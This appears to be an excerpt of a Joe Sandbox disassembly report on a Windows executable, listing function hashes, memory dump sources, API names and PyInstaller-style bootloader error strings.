                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3986d2e28db3ad4c814196551e744b7f12e089580c78501851383343d29f5119
                                                                                          • Instruction ID: 89907cd968e3827ddeb2954a292e7872d1815b3e389021c53c31c5fef620a7aa
                                                                                          • Opcode Fuzzy Hash: 3986d2e28db3ad4c814196551e744b7f12e089580c78501851383343d29f5119
                                                                                          • Instruction Fuzzy Hash: AF519476A18A5187E7248F29D64123873B0EB66F59F244131EECDA77A4CF3AE843C740
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 56eab1984f79c1160248cb97b5e30aec2666dd062f10dae5dc3084fdbc1595d5
                                                                                          • Instruction ID: 29a5a111b76a0d03716985ce70d417c58b17b338ac3bc950b36224edef2af3e6
                                                                                          • Opcode Fuzzy Hash: 56eab1984f79c1160248cb97b5e30aec2666dd062f10dae5dc3084fdbc1595d5
                                                                                          • Instruction Fuzzy Hash: 86517636A18A5587E7358F29D14123837B1EB66F59F244131EECCA7798CF3AE842C780
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e4a792dd5f357ba9ab053cb868b8428acf2d0115ad083e523ed5123ef832f09c
                                                                                          • Instruction ID: e6dae09c184d49e3fbf3d81b887572f33529a1ee75b1df429a9492cb58d5b98e
                                                                                          • Opcode Fuzzy Hash: e4a792dd5f357ba9ab053cb868b8428acf2d0115ad083e523ed5123ef832f09c
                                                                                          • Instruction Fuzzy Hash: E7518736A18E5287E7348F29D64123837B1EB66B59F244131EE8CA7795CF3AE853C740
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5b37b721d2520797c932084b48cf8e5c5b4bbfd8b4955e3aae9fbd8879836657
                                                                                          • Instruction ID: a39a3015604e98dcdbc1932061225712f72c2153624b1aa779df4d1f56d50b5b
                                                                                          • Opcode Fuzzy Hash: 5b37b721d2520797c932084b48cf8e5c5b4bbfd8b4955e3aae9fbd8879836657
                                                                                          • Instruction Fuzzy Hash: A951B536A18A5187E7248F29C15123837B0EB66F59F354131EE8CA77A4DF3AE943C740
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                          • Instruction ID: 319fc977ef92ccd2288a1cfeea822eafa777ea3df61446613ea91709bb13806e
                                                                                          • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                          • Instruction Fuzzy Hash: 9A412A52C0D68B46E966CD1C47016B41AA0AF337B2D585271FDDBB37CFCD0DA99AC211
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                          • String ID:
                                                                                          • API String ID: 588628887-0
                                                                                          • Opcode ID: f111dc0bb75c4fd458f0a84966b8cb0fe478d08570652a426d7f95957c6d4c4f
                                                                                          • Instruction ID: a6e4815120387bcb4e0777e38d771f90b93c9d2e76e8557a1f364291493c15ef
                                                                                          • Opcode Fuzzy Hash: f111dc0bb75c4fd458f0a84966b8cb0fe478d08570652a426d7f95957c6d4c4f
                                                                                          • Instruction Fuzzy Hash: 4341D162B14A5582EF04CF2ADA55179B3A1FB59FD1B199032EE8DE7B58DF3CD4428300
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e0b9409b015bea46d2036294c0136b3200ade656a83a3c77deb383565566a918
                                                                                          • Instruction ID: 0f77e469e3eeb219c746b3fc2b400d5127c70d79db0ba4cb0da6d085ca54c2b0
                                                                                          • Opcode Fuzzy Hash: e0b9409b015bea46d2036294c0136b3200ade656a83a3c77deb383565566a918
                                                                                          • Instruction Fuzzy Hash: 8531D632B08B4282E714DF25664217E76A5AF96BE1F154239FADDA3BD6DF3CD0018304
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c3f3f1020485e8a41a296fc930dbc96221e618d45f39aaa63d951921bdf06b5a
                                                                                          • Instruction ID: 02599e414203625ec469bc581f72556ea4d280897c65da04ff7da4827f0d6256
                                                                                          • Opcode Fuzzy Hash: c3f3f1020485e8a41a296fc930dbc96221e618d45f39aaa63d951921bdf06b5a
                                                                                          • Instruction Fuzzy Hash: ECF0C271B186928EEBAC8F28A90367977E4F718380F808539E6CCC3B14DB3C80608F04
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b04046989d87c8dc885ed01c2b3f2aaa9c0b13633c97905e42662c4d2108a614
                                                                                          • Instruction ID: 997ddd35b3e435ee3119dc80d97de484f000d39a75d51787b99d2cd48559bd15
                                                                                          • Opcode Fuzzy Hash: b04046989d87c8dc885ed01c2b3f2aaa9c0b13633c97905e42662c4d2108a614
                                                                                          • Instruction Fuzzy Hash: C2A001A2A08842D0F6448F00AA560302330BB7370AB410032E09EE14A8DE3CB8408A80
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc
                                                                                          • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                          • API String ID: 190572456-4266016200
                                                                                          • Opcode ID: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
                                                                                          • Instruction ID: 91b25e5436870952f57aa170b4daf364c0d4ca7fcb48594fbb996e397cfcced8
                                                                                          • Opcode Fuzzy Hash: 849092ee313d90182648ac5091f6841dd271f5938a0293141bcf3cafd9cdb4f6
                                                                                          • Instruction Fuzzy Hash: E312C165E0EB0390FA158F05EB9917463B1AF37747B945436F8CEA63A4EF7CB5488202
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message_fread_nolock
                                                                                          • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                                          • API String ID: 3065259568-2316137593
                                                                                          • Opcode ID: 1f64e21f2ee06bf2ae5728024b8ca0aea1db7afc2fc74e32ddaba13588a02f72
                                                                                          • Instruction ID: de31e9cc568e455da15e20862782c3ac0fcfe1bf77776765b6aac6beacca5ace
                                                                                          • Opcode Fuzzy Hash: 1f64e21f2ee06bf2ae5728024b8ca0aea1db7afc2fc74e32ddaba13588a02f72
                                                                                          • Instruction Fuzzy Hash: 5F51C362A0968346FA20AF11A6552FA6374EF76BC5F404132FEDDE7A95EE3CF5018700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                          • String ID: P%
                                                                                          • API String ID: 2147705588-2959514604
                                                                                          • Opcode ID: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
                                                                                          • Instruction ID: 10a89bfbec0b45b43f3417cb6a11f7c93af732cd47f429f09c930462704b43a8
                                                                                          • Opcode Fuzzy Hash: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
                                                                                          • Instruction Fuzzy Hash: E951F836614BA186D6349F26E4181BAB7B1FBA9B66F004122EFDE83794DF3CD045DB10
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: -$:$f$p$p
                                                                                          • API String ID: 3215553584-2013873522
                                                                                          • Opcode ID: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
                                                                                          • Instruction ID: 8a6eb87cda94f9f7e82aad87d11cf78360f828c828924473eea9ee9dc3e6991e
                                                                                          • Opcode Fuzzy Hash: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
                                                                                          • Instruction Fuzzy Hash: 6812B422A0C36387FB209E14D35667AB671FB62752F944035F6DAA76C4DF3CE4908B10
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: f$f$p$p$f
                                                                                          • API String ID: 3215553584-1325933183
                                                                                          • Opcode ID: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
                                                                                          • Instruction ID: aa6c17b70efe562ee379d920a9d61ff2e14bb0fd2b1a31fe040da66aa63e8caf
                                                                                          • Opcode Fuzzy Hash: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
                                                                                          • Instruction Fuzzy Hash: 581292A3E0D15387FB609E14E256279767AEBA2752F944131F6DDA7AC4DF3CE4808B00
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message
                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                          • API String ID: 2030045667-3659356012
                                                                                          • Opcode ID: 98d933ec4259691fc6dfc760f975a8669145de4ba037c576ca538a9cc007f247
                                                                                          • Instruction ID: 986797e6a9b22a2bc9f192a17e978f652261fd06f540b24999234ed15b81c84d
                                                                                          • Opcode Fuzzy Hash: 98d933ec4259691fc6dfc760f975a8669145de4ba037c576ca538a9cc007f247
                                                                                          • Instruction Fuzzy Hash: CD318422B0864346FA21DF52A6455BA63B0EF36BD5F444032EECDA7A56DE3CF5458700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                          • String ID: csm$csm$csm
                                                                                          • API String ID: 849930591-393685449
                                                                                          • Opcode ID: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
                                                                                          • Instruction ID: 4b3440b77ed67f5d34fb4bbd6bd5fbcc2c7e5b88dc43495b59d3d631fb9d0e95
                                                                                          • Opcode Fuzzy Hash: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
                                                                                          • Instruction Fuzzy Hash: 07D17D32A0874286EB209F6596452BD77B0FF66799F100235FA8DA7B69DF38E491C700
                                                                                          APIs
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB28A47
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB28A9E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide
                                                                                          • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                          • API String ID: 626452242-27947307
                                                                                          • Opcode ID: 68ef013f5c257526e5a4a2decc1cb5deb5404ee9189374e1049a365f6b0b0852
                                                                                          • Instruction ID: 108b40fad511047e52cd5c2c5845004324125079a30e8a385e425615fc6a8684
                                                                                          • Opcode Fuzzy Hash: 68ef013f5c257526e5a4a2decc1cb5deb5404ee9189374e1049a365f6b0b0852
                                                                                          • Instruction Fuzzy Hash: 5541A132608B8282E620DF15BA4417AB6B1FFA6B91F548535FACDA7B95DF3CE441C700
                                                                                          APIs
                                                                                          • WideCharToMultiByte.KERNEL32(?,00007FF6CEB239CA), ref: 00007FF6CEB28F31
                                                                                            • Part of subcall function 00007FF6CEB229C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6CEB28AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB229F4
                                                                                            • Part of subcall function 00007FF6CEB229C0: MessageBoxW.USER32 ref: 00007FF6CEB22AD0
